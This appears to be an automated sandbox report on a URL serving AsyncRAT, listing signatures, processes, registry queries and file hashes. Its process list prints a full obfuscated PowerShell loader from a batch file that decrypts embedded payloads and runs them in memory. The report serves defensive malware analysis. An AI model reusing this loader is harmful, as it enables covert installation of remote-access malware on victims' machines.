Malware Analysis Report

2025-01-02 12:09

Sample ID 240419-thj91age75
Target http://193.222.96.114:7287/
Tags
asyncrat default rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Threat Level: Known bad

The file http://193.222.96.114:7287/ was found to be: Known bad.

Malicious Activity Summary

asyncrat default rat

AsyncRat

Async RAT payload

Blocklisted process makes network request

Checks processor information in registry

Suspicious behavior: AddClipboardFormatListener

Suspicious behavior: EnumeratesProcesses

Suspicious use of SendNotifyMessage

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Enumerates system info in registry

Modifies registry class

NTFS ADS

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-19 16:03

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-19 16:03

Reported

2024-04-19 16:07

Platform

win10v2004-20240412-en

Max time kernel

227s

Max time network

231s

Command Line

"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "http://193.222.96.114:7287/"

Signatures

AsyncRat

rat asyncrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Modifies registry class


NTFS ADS

Description Indicator Process Target
File created C:\Users\Admin\Downloads\jiteon.xlsx:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
File created C:\Users\Admin\Downloads\GoGi.bat:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
File created C:\Users\Admin\Downloads\index.hta:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2760 wrote to memory of 3216 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 4232 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 1672 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "http://193.222.96.114:7287/"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url http://193.222.96.114:7287/

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3216.0.2113838200\2137454564" -parentBuildID 20230214051806 -prefsHandle 1804 -prefMapHandle 1796 -prefsLen 22076 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1b4496d3-b961-4367-be2b-11bc78c9419d} 3216 "\\.\pipe\gecko-crash-server-pipe.3216" 1896 1957bf0d758 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3216.1.676900925\1352277777" -parentBuildID 20230214051806 -prefsHandle 2464 -prefMapHandle 2460 -prefsLen 22927 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5c76c319-dcf0-40cc-9c7a-59ff2a872f2a} 3216 "\\.\pipe\gecko-crash-server-pipe.3216" 2492 1956f28ab58 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3216.2.1955429842\50283786" -childID 1 -isForBrowser -prefsHandle 2884 -prefMapHandle 2880 -prefsLen 23030 -prefMapSize 235121 -jsInitHandle 1252 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7edeb2b6-6680-41c2-9aa1-80f696754c03} 3216 "\\.\pipe\gecko-crash-server-pipe.3216" 3008 1957ef23e58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3216.3.2030326682\1267245035" -childID 2 -isForBrowser -prefsHandle 3636 -prefMapHandle 2652 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1252 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {38990bfb-d9e2-4d6d-b0b3-89a119bed615} 3216 "\\.\pipe\gecko-crash-server-pipe.3216" 876 1956f240c58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3216.4.655664972\1136452896" -childID 3 -isForBrowser -prefsHandle 5192 -prefMapHandle 5188 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1252 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1e59930b-9b8a-435b-ae2b-c64aa350b799} 3216 "\\.\pipe\gecko-crash-server-pipe.3216" 5204 19582105958 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3216.5.1505188768\1873080407" -childID 4 -isForBrowser -prefsHandle 5332 -prefMapHandle 5276 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1252 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c4951e1c-d5dc-4a45-91be-aaea7cd8465c} 3216 "\\.\pipe\gecko-crash-server-pipe.3216" 5316 195821d2d58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3216.6.561859453\338626641" -childID 5 -isForBrowser -prefsHandle 5496 -prefMapHandle 5500 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1252 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1754cb65-b6d0-41f8-a571-d9b77a71abf5} 3216 "\\.\pipe\gecko-crash-server-pipe.3216" 5488 195825e3258 tab

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Downloads\jiteon.xlsx"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\GoGi.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\Downloads\GoGi.bat"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\Downloads\GoGi.bat';$gPQY='CmYpnhamYpnnmYpngmYpnemYpnEmYpnxtmYpnenmYpnsmYpniomYpnnmYpn'.Replace('mYpn', ''),'LoaUtEPdUtEP'.Replace('UtEP', ''),'MaiCYgQnMCYgQodCYgQuleCYgQ'.Replace('CYgQ', ''),'SprHTnlitrHTn'.Replace('rHTn', ''),'TrrzhRarzhRnsfrzhRorrzhRmFrzhRirzhRnarzhRlBlrzhRorzhRckrzhR'.Replace('rzhR', ''),'GetuUbXCuUbXuuUbXruUbXreuUbXntuUbXPuUbXrouUbXcuUbXesuUbXsuUbX'.Replace('uUbX', ''),'FrFEdOomBFEdOasFEdOe64FEdOStrFEdOiFEdOngFEdO'.Replace('FEdO', ''),'ReanclddLncldinencldsncld'.Replace('ncld', ''),'DjPqYejPqYcojPqYmpjPqYrejPqYssjPqY'.Replace('jPqY', ''),'IPIJhnvPIJhokPIJhePIJh'.Replace('PIJh', ''),'CopZKPiyTZKPioZKPi'.Replace('ZKPi', ''),'ElIXGDeIXGDmIXGDenIXGDtAIXGDtIXGD'.Replace('IXGD', ''),'CruXrmeuXrmatuXrmeDeuXrmcryuXrmptuXrmoruXrm'.Replace('uXrm', ''),'EJuQRntJuQRrJuQRyPJuQRoinJuQRtJuQR'.Replace('JuQR', '');powershell -w hidden;function oukWk($hMAdX){$uBEEb=[System.Security.Cryptography.Aes]::Create();$uBEEb.Mode=[System.Security.Cryptography.CipherMode]::CBC;$uBEEb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$uBEEb.Key=[System.Convert]::($gPQY[6])('TGdOerQan8DiYOIpc1W3E6Uf7wMJSi91JjPhdKuCB3Q=');$uBEEb.IV=[System.Convert]::($gPQY[6])('CruLH9j6aex2cpz0fozZ+w==');$XBRRE=$uBEEb.($gPQY[12])();$gomww=$XBRRE.($gPQY[4])($hMAdX,0,$hMAdX.Length);$XBRRE.Dispose();$uBEEb.Dispose();$gomww;}function SIliJ($hMAdX){$nQeHe=New-Object System.IO.MemoryStream(,$hMAdX);$EvPMN=New-Object System.IO.MemoryStream;$uxdRy=New-Object System.IO.Compression.GZipStream($nQeHe,[IO.Compression.CompressionMode]::($gPQY[8]));$uxdRy.($gPQY[10])($EvPMN);$uxdRy.Dispose();$nQeHe.Dispose();$EvPMN.Dispose();$EvPMN.ToArray();}$WrkBk=[System.IO.File]::($gPQY[7])([Console]::Title);$dItwN=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 5).Substring(2))));$Yylgf=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 
6).Substring(2))));[System.Reflection.Assembly]::($gPQY[1])([byte[]]$Yylgf).($gPQY[13]).($gPQY[9])($null,$null);[System.Reflection.Assembly]::($gPQY[1])([byte[]]$dItwN).($gPQY[13]).($gPQY[9])($null,$null); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3216.7.56714659\332384980" -childID 6 -isForBrowser -prefsHandle 6176 -prefMapHandle 3440 -prefsLen 31048 -prefMapSize 235121 -jsInitHandle 1252 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {52b240d9-29ae-4b20-a32b-307ec711cfd1} 3216 "\\.\pipe\gecko-crash-server-pipe.3216" 5784 1957ef23858 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3216.8.332503400\1079475351" -childID 7 -isForBrowser -prefsHandle 3592 -prefMapHandle 6520 -prefsLen 31263 -prefMapSize 235121 -jsInitHandle 1252 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {80472f49-da0d-4a38-ac53-2f65a412bf9f} 3216 "\\.\pipe\gecko-crash-server-pipe.3216" 6532 19580db2258 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3216.9.2016357290\756116293" -childID 8 -isForBrowser -prefsHandle 6512 -prefMapHandle 10716 -prefsLen 31263 -prefMapSize 235121 -jsInitHandle 1252 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bdc2a477-be74-464a-8dc0-7fdaeac19329} 3216 "\\.\pipe\gecko-crash-server-pipe.3216" 10704 1957ef45058 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3216.10.1896142811\464486275" -childID 9 -isForBrowser -prefsHandle 10556 -prefMapHandle 10548 -prefsLen 31263 -prefMapSize 235121 -jsInitHandle 1252 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {00243c60-bd80-410f-a5e8-3d5eaf2038cd} 3216 "\\.\pipe\gecko-crash-server-pipe.3216" 10476 1958620f858 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3216.11.1891116795\496201863" -childID 10 -isForBrowser -prefsHandle 9256 -prefMapHandle 9160 -prefsLen 31263 -prefMapSize 235121 -jsInitHandle 1252 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0a0f45a6-cd1e-458f-b06c-9d69b4d121c4} 3216 "\\.\pipe\gecko-crash-server-pipe.3216" 9856 195893a4e58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3216.12.1425077980\1194327202" -childID 11 -isForBrowser -prefsHandle 6532 -prefMapHandle 6712 -prefsLen 31263 -prefMapSize 235121 -jsInitHandle 1252 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a52ef1ca-483e-4849-8a7b-2d75c88a548d} 3216 "\\.\pipe\gecko-crash-server-pipe.3216" 5432 1958b26bb58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3216.13.387638766\2027148250" -childID 12 -isForBrowser -prefsHandle 9364 -prefMapHandle 9552 -prefsLen 31263 -prefMapSize 235121 -jsInitHandle 1252 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fd36cc27-0233-495e-a7f3-f05e68ab9d78} 3216 "\\.\pipe\gecko-crash-server-pipe.3216" 9340 1957b13dd58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3216.14.1601893434\1311254243" -childID 13 -isForBrowser -prefsHandle 6732 -prefMapHandle 3596 -prefsLen 31272 -prefMapSize 235121 -jsInitHandle 1252 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1e408baf-55ed-4979-b95f-b622f7890d19} 3216 "\\.\pipe\gecko-crash-server-pipe.3216" 6568 19586272958 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3216.15.241436258\439829394" -childID 14 -isForBrowser -prefsHandle 5884 -prefMapHandle 5896 -prefsLen 31272 -prefMapSize 235121 -jsInitHandle 1252 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4be1162c-bcf4-428a-83d3-3619de0467ec} 3216 "\\.\pipe\gecko-crash-server-pipe.3216" 6676 1958ac62b58 tab

Network


Files

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\activity-stream.discovery_stream.json.tmp

MD5 9bcec1ed9a44ca5effa617f4f93b6211
SHA1 50ec5452b429da160a89536def5958931877c8af
SHA256 b6e7a899aef9d74899d8a405b3ab9630582a838aebb7b191fb93621390f6da46
SHA512 04ccf8c06d54e64eb92ae2d304f48733b75c4160a609adf17fccc86fd838b06bcb00151ad8f701a326b1cf1ad881ecc168f97a7e8bfe0715bcfc20be9e8cbde7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\sessionstore-backups\recovery.jsonlz4

MD5 dad152db4cb073feac3b68b9a1f5e22e
SHA1 2193da5d47177e047c6a6c467d03dc80b59c4f45
SHA256 337e556065c4dc8196ce82ed9cdb0ec6ef4911612af689fddef17479ae0f744e
SHA512 0c6cc79e12eb085b1b03fa7f66357e88b724a4317ed115cb7329bb64707336f35961077e72215c2d0bab96e91db92bc8e737a69bff73299e99a49ca02a993418

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 85430baed3398695717b0263807cf97c
SHA1 fffbee923cea216f50fce5d54219a188a5100f41
SHA256 a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e
SHA512 06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll

MD5 fe3355639648c417e8307c6d051e3e37
SHA1 f54602d4b4778da21bc97c7238fc66aa68c8ee34
SHA256 1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e
SHA512 8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info

MD5 3d33cdc0b3d281e67dd52e14435dd04f
SHA1 4db88689282fd4f9e9e6ab95fcbb23df6e6485db
SHA256 f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b
SHA512 a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\prefs-1.js

MD5 7aee3c610a901c46848f3a8203c27656
SHA1 af7232a81c4accf1891a4c37a38db1ad052fbd5f
SHA256 80e149d1b8e7aef48dad4a3e552f72468f77863425f2ddcb5cef1170da810500
SHA512 07f61e6daf75ce3f0ec96edb24e88f61062549de7db3546168693e9e411f8aedcf8149b6afdad412d5968f2bd7832007c0725a417f376eaa19cb2e4b6c2a33eb

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\entries\C72D4296C2EBC6FD41A9F780CD0C8F30F0FF937C

MD5 813bf372751fffbdeedb292202e55b97
SHA1 09bd91cad26cd66eea569d8e0e62ef7167b944d4
SHA256 08ec27d2587c678ef9f71319e7a0d9c986b9857ee7cb762ee7b67705584a6904
SHA512 928ba4ec4d99aa8ded86d01e898b87faa2c568ddb1e3c00486ee17049b76709f14c0ab7cd4160055cdeb14d15a366896911f8fb502c052e80e093ec5b789ddc5

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 a01c5ecd6108350ae23d2cddf0e77c17
SHA1 c6ac28a2cd979f1f9a75d56271821d5ff665e2b6
SHA256 345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42
SHA512 b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json

MD5 8be33af717bb1b67fbd61c3f4b807e9e
SHA1 7cf17656d174d951957ff36810e874a134dd49e0
SHA256 e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd
SHA512 6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt

MD5 49ddb419d96dceb9069018535fb2e2fc
SHA1 62aa6fea895a8b68d468a015f6e6ab400d7a7ca6
SHA256 2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
SHA512 48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib

MD5 688bed3676d2104e7f17ae1cd2c59404
SHA1 952b2cdf783ac72fcb98338723e9afd38d47ad8e
SHA256 33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
SHA512 7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig

MD5 937326fead5fd401f6cca9118bd9ade9
SHA1 4526a57d4ae14ed29b37632c72aef3c408189d91
SHA256 68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81
SHA512 b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll

MD5 33bf7b0439480effb9fb212efce87b13
SHA1 cee50f2745edc6dc291887b6075ca64d716f495a
SHA256 8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e
SHA512 d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\prefs-1.js

MD5 02ba2f2d28f92324946c4b846f0ef278
SHA1 518f5353e722b6027b3376015b948d516d862d2d
SHA256 257964daed6b2ca482ef22ed272d4f59e68974cec349a11686ea9af8ca730fd1
SHA512 766ad89f48d7ace44193435d7063264efaecd181bdc21560ce329b10ef904f2c76ea57c5b18f14de81a697b9bfa7552b372707b10a9e8d27c60841af36d1bca9

C:\Users\Admin\Downloads\OzUUjFK9.xlsx.part

MD5 dfa28ceef932c1605d40981a5023dab0
SHA1 a6e8c5cdd144cb27685198fecad8f9def48dfbe8
SHA256 9e0bac9938b4059f69ed52af74337c38c242213ecd432746a483d44e1e74dff6
SHA512 28bc8a4c30e566a60280b194f5442c160f0b9c8b3dd10fa8d321035e7a3b76271373274b0d25bb8f04ac213f4293f3bde7ee8c6ff7d77caa2a4ba5276e0ccc80

C:\Users\Admin\Downloads\GoGi.EIAmXjDS.bat.part

MD5 3a8565cccde35c1e9b7ffafc96056857
SHA1 50fd67344b6c9c39977c293417dec8ffa34b2507
SHA256 622ec2867f5df3c0022e56e95fb8c34af9e64db758261bc193c8741e48eb883f
SHA512 45c7709148d5c890c4adf413d5cee8d55d4ecfeb26b0cc7c8e0f7752444b292b2efb93862fc6f78c47271b4b652795640412d20a2fa5a46fcc9b51b832bd3294

C:\Users\Admin\Downloads\GoGi.bat

MD5 cab2108a81d68104dd9b15efcedf8351
SHA1 03852c18f75cad87f71693fb1973d9a04e8910ed
SHA256 a2dfe970dc385f9aa1a81946c4bc41144d182dbddb02e37ce4c5b52c9b884aaa
SHA512 e474ce03766f8e21fdb14e072144e8e1c5fa1f30e66ea4f7a05fade86bd783fb4dec65d23ab01861524959a0a029cb2112074116fdbd72d02ab4794216ed95f5

C:\Users\Admin\Downloads\index.GPBUM8KI.hta.part

MD5 3f94f80e352544637c32101734c80033
SHA1 16116f8e2f096c699046117e0acfe88e93d13729
SHA256 4bbaaa32c5f71d04eb61c6c02c3a4fc04ad6c417e09a8a73b30435947c2df619
SHA512 4540e277fe696bb168e04a256cce82d98e921c8c7a977a6a15acaa6ce5f2a263a19c3f4048012ae07f8ace65acfa60710e8641c7e299211d32a1089558ab1988

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\prefs-1.js

MD5 b7d1e3b8bc43fc023e92ff4a4c746193
SHA1 43aad76f2e1f0ba23b902a2be794f22e5f7201b3
SHA256 dcb0f12460dbcab69be0fa5101b7453079f7bee60c828114587e1364cd7a1597
SHA512 4e348c0164b3f9f49430896cdb5b142fa3452ce562738da61d1679513807de9051ac465e775cffad7ee36fc58795ff9452fadf5c51d7b4fbc72cb960d6f04c17

memory/5160-2237-0x00007FF85B6F0000-0x00007FF85C1B1000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\sessionstore-backups\recovery.jsonlz4

MD5 a817c54d2f71e208a6a094f7afcaf276
SHA1 59692aa2d217adfdc60dfe8a0196ab2d35caa3e3
SHA256 cac944a1faa7cf8d6de8a310acaa9756cc24c05247e834d417e1a5aa5519baa6
SHA512 2c0415d49d97fccb25ca133b5c2f3a30844700843efe5940b961e3924aa7ddef9c97ed6d5f8a80adf63d4e96f7361d5257dd36051009621a2bd70b21ed84ba52

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\storage\default\https+++www.virustotal.com\cache\morgue\154\{ed5299f1-b6ba-4d3a-a926-9a8b8a66c79a}.final

MD5 c366a3613bd3d6329d43d12117ed4059
SHA1 d3e8e59672d2ce345769afd88a71fbb90d70943d
SHA256 582807864cf6905f2404f2bb7e84789d15afbb0bd5c9566e04cf7b8cb6c29a7b
SHA512 7087bec44839f155caa8a57a65d4fcc117796edb80a991a9bcea620be9d0a497841148f36f09fa4995ef4dd7bd65c566760ff9f32c48a154fb3cacf1737a127a

memory/5160-2317-0x00000247899B0000-0x00000247899C0000-memory.dmp

memory/5160-2318-0x00000247899B0000-0x00000247899C0000-memory.dmp

memory/5160-2345-0x00000247899B0000-0x00000247899C0000-memory.dmp

memory/5160-2365-0x00007FF88CE70000-0x00007FF88D065000-memory.dmp

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\entries\CD429C0BD381706883301C98CDE6E7D5C78016A3

MD5 55138ac2670326e53d4af333f6f89511
SHA1 859870da3d61ecdf38d7f7e7f7abe07ef0eb0a0b
SHA256 b63861401978aa2383dfad43f465051616b585c6bdc383b216695ffdeba30ffe
